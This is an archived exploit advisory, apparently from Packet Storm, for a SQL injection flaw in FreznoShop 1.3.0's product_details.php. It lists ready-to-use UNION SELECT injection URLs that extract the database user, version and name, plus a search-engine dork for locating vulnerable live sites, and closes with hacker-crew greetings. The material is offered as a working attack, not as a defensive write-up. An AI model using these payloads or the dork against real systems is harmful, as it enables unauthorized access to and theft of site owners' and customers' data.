FreznoShop 1.3.0 SQL Injection

2009-04-14T00:00:00
ID PACKETSTORM:76603
Type packetstorm
Reporter NoGe
Modified 2009-04-14T00:00:00

Description

                                        
                                            `======================================================================================  
  
  
[o] FreznoShop 1.3.0 SQL Injection Vulnerability  
  
Software : FreznoShop version 1.3.0  
Vendor : http://sourceforge.net/projects/freznoshop/  
Download : http://sourceforge.net/project/platformdownload.php?group_id=86090  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
======================================================================================  
  
  
[o] Vulnerable file  
  
product_details.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/product_details.php?id=[SQL}  
product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11--  
product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11,12--  
  
  
  
[o] Dork  
  
"Powered by FreznoShop"  
  
  
======================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3  
H312Y yooogy mousekill }^-^{ loqsa  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
======================================================================================  
  
`